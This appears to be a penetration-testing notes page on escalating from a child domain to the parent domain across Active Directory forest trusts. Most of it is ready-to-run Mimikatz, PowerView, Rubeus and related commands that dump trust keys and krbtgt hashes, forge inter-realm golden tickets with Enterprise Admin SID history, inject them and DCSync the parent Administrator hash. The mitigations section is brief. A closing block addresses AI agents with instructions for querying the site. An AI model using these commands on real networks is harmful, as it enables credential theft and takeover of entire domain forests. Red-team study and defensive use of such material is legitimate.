# Child to Parent Movement Across Trusts

Domains that are in the same forest have an explicit two way trust between them. Between parent and child domains there are trust keys that can be used to move elsewhere within the forest.

The are two ways to take advantage of this:

1. Using Trust Tickets
2. Using krgtbt

If we are able to obtain a single Domain Admin, the trust of the entire forest would be at risk because we would now be able to move anywhere.

The attack is very similar to forging Silver or Golden Tickets. However, we must obtain the trust key, or the password shared between the two domains that maintains the trust.

Authentication is very similar to the average Kerberos authentication. The difference is that an extra step is taken to authenticate to the KDC on the other domain. This must occur because KDCs cannot grant TGSs to other domains. The target services credentials necessary to create tickets on the other domain are stored in the other domains DC.

The trust key becomes something like a middleman which allows the user to request a TGS on the other domain. It is this key which is encrypted into the TGT before the TGS request to the next domain is made instead of the DC's krbtgt password.

If there are more than two domains in a forest, the authentication procedure gets more complicated depending on the trust relationships within the forest.

![From PentesterAcademy.com](/files/H6m46q9kbYoN21ydcyRI)

## Using Trust Tickets to Move Laterally

### Step 1

* To forge these tickets, we need the trust key. So we must find that first. This will require Admin privileges.

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <dc>

# If you have the computer name of the parent, you could also use that since the NTLM hash of the parent DC is the trust key
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<current_domain>\<parent_DC_machine_account>"'
```

### Step 2

* Now that we have the trust key, we can forge an Inter-Realm TGT (doesn't require Admin privileges). However, we first need the Enterprise Admins SID

```powershell
# PowerView
Get-NetGroup -Domain <parent_domain> -FullData | select samaccountname,objectsid | | ?{$_.samaccountname -match "Enterprise Admins"}
```

### Step 3

* Now we can forge the Inter-Realm TGT

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<domain_SID> /sids:<enterprise_admin_SID> /rc4:<trust_key> /service:krbtgt /target:<parent_domain> /ticket:C:\path\to\new\ticket.kirbi"'
```

### Step 4

* And then forge a TGS to the parent

```powershell
# asktgs.exe
asktgs.exe <trust_ticket.kirbi> <service>/<parent_domain>
# example
asktgs.exe .\trust_ticket1.kirbi CIFS/parentDC.bizcorp.local
```

### Step 5

* Then we can inject the ticket created from the last step

```powershell
# kirbikator.exe
kirbikator.exe lsa .\<service_ticket_to_parent.kirbi>
```

### Step 6

* Now check our access to the parent

```powershell
# If CIFS...
ls \\parent.DC\C$
# If WMI
Get-WmiObject Win32_Processor -ComputerName <parent.dc>
```

### Steps 4 and 5 Can Also Be Done with Rubeus.exe

```powershell
.\Rubeus.exe asktgs /ticket:<TGT_trust_ticket.kirbi> /service:<service>/<parent_DC> /dc:<parent_DC> /ptt
```

## Using krbtgt to Move Laterally

### Method 1 - Abusing SID History to Escalate to Enterprise Admin

* Step 1 - Make Sure You Have the krbtgt Hash

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

* Step 2 - Create an Inter Realm TGT

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<parent_enterprise_admin_sid> /krbtgt:<krbtgt_hash> /ticket:C:\path\to\ticket.kirbi"'
```

* Step 3 - Inject the Ticket

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'
```

* Step 4 - Check the Injection

```powershell
ls \\<parent_DC>\C$
```

### Method 2 - The Quieter Way, Using the Domain Controllers' SID and Enterprise Domain Controllers SID

* First, get the parent Domain Controllers SID

```powershell
Get-NetGroup -Domain <parent_domain> -FullData | select samaccountname,objectsid | ?{$_.samaccountname -eq "Domain Controllers"}
```

* Then create the ticket

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:<current_DC_machine_account> /domain:<current_domain> /sid:<current_domain_sid> /groups:516 /sids:<parent_DC_sid>,S-1-5-9 /krbtgt:<krbtgt_hash> /ptt"'
```

* Now you can DCSync to get the parent DC Administrator hash

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<parent_domain>\Administrator /domain:<parent_domain>"'
```

### Mitigations

Since intra-forest trusts are considered by default to be secure there is no real effective defense mechanism.

What can be done is to change the machine account passwords often in order to reduce persistence within the network. However, the best thing to do is protect the domain controller from any outside intrusion or code execution.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/lateral-movement/child-to-parent-movement-across-trusts.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.